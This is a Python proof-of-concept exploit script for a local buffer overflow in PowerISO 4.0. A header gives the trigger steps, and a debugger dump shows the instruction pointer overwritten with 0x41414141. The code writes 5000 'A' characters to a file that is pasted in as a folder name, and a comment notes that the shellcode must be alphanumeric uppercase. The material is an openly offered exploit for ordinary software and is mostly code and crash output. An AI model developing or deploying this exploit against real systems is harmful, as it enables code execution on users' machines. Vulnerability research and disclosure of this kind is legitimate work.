#!/usr/bin/env python
####################################################################################
#
# Poweriso 4.0 Local Buffer Overflow PoC
# Found By: Dr_IDE
# Tested On: XPSP3
# Usage: Create New ISO, Add a New Folder, Paste to Rename Folder, Click Save
# Notes: This must have been fixed somewhere between 4.0 and 4.7
#
####################################################################################
'''
EAX 00ADDDC0
ECX 00000000
EDX 00004000
EBX 00000000
ESP 0211FA6C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~0"
EBP 00000000
ESI 0211FA20
EDI 00ADC2F0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EIP 41414141
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFD5000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty +UNORM 3C0A 0012EBE8 00000000
ST1 empty -UNORM F674 00000000 0000000C
ST2 empty 3.3165366670546675450e-4932
ST3 empty 0.0000000000019151440e-4933
ST4 empty 3.3165367202851109490e-4932
ST5 empty +UNORM 0001 0012F674 00000000
ST6 empty +UNORM 000C 000B0418 7E418734
ST7 empty -UNORM ABCD 7E43E577 0012F674
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
'''
# Shellcode must be Alpha Upper
buff = ("\x41" * 5000)
f1 = open("poweriso.txt","w")
f1.write(buff)
f1.close()
